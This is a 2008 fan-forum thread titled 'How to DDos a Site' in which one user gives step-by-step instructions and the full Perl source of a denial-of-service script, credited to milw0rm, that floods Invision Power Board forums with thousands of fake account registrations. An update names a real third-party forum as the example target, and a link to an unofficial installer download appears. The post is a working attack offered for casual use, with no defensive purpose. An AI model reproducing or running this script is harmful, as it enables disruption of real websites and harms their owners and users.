Final Fantasy Talk

Would you like to react to this message? Create an account in a few clicks or log in to continue.

Welcome to Final Fantasy Talk where you can talk about everything related to Square-Enix, Graphics, or just talking and getting to know new people.


2 posters

    How to DDos a Site

    HermitDash
    HermitDash
    Graphics Designer
    Graphics Designer


    Male
    Number of posts : 855
    Age : 31
    Location : Brooklyn
    Job/hobbies : C++
    Humor : Anythingg~
    FFT Points : 735
    Registration date : 2008-09-17

    How to DDos a Site Empty How to DDos a Site

    Post by HermitDash Tue Sep 30, 2008 10:15 am

    First of all, you have to download active perl. You can download it from here:
    CODE
    Code:
    http://www.curse-x.com/downloads/ActivePerl.zip
    Then extract the file in any folder. Open it and run the installer.

    Once you've installed it, open CMD. (Start/RUN/cmd)
    Write: cd C:/Perl/bin (The slashes are wrong sided as I can't do them proprelly with Ubuntu)

    Open any text editor(notepad)
    Type in:

    Code:
    CODE
    #!/usr/bin/perl
    use IO::Socket;
    ##########################################################
    ##        _______ _______ ______          #
    ##        |______ |______ |    \        #
    ##        ______| |______ |_____/        #
    ##                                        #
    ##IPB Register Multiple Users Denial of Service            #
    ##Doesn't Work on forums using "Code Confirmation"    #
    ##Created By SkOd                                        #
    ##SED security Team                                      #
    ##http://www.sed-team.be                                #
    ##skod.uk@gmail.com                                      #
    ##ISRAEL                                                #
    ##########################################################

    print q{
    ############################################################
    #        Invision Power Board Multiple Users DOS      #
    #        Tested on IPB 2.0.1              #
    #        created By SkOd. SED Security Team            #
    ############################################################
    };
    $rand=rand(10);
    print "Forum Host: ";
    $serv = <stdin>;
    chop ($serv);
    print "Forum Path: ";
    $path = <stdin>;
    chop ($path);
    for ($i=0; $i<9999; $i++)
    {
    $name="sedXPL_".$rand.$i;
    $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
    $len = length $data;
    $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
    print $get1 "POST ".$path."index.php HTTP/1.0\n";
    print $get1 "Host: ".$serv."\n";
    print $get1 "Content-Type: application/x-www-form-urlencoded\n";
    print $get1 "Content-Length: ".$len."\n\n";
    print $get1 $data;
    syswrite STDOUT, "+";
    }
    print "Forum shuld be Dosed. Check it out...\n";

    # milw0rm.com [2006-02-10
    ]
    Save it as anything.pl (pl stands for perl)

    In your command prompt, type in anything.pl
    Now read the instructions that they give you.

    Enjoy your DoS!

    script found on milw0rm

    Update:
    Due to some request and people who seem unable to make it work...here's an example using
    CODE
    Code:
    http://www.quebecurbain.qc.ca/forum
    You have to write anything.pl
    host:
    CODE
    Code:
    http://www.quebecurbain.qc.ca
    path: /forum/
    There you go!
    Brad
    Brad
    Administrator
    Administrator


    Number of posts : 687
    FFT Points : El1t3 1337
    Rep : -3
    Registration date : 2008-09-19

    How to DDos a Site Empty Re: How to DDos a Site

    Post by Brad Tue Sep 30, 2008 10:21 am

    *Cough* Ahem.

      Similar topics

      -

      Current date/time is Wed May 08, 2024 6:44 pm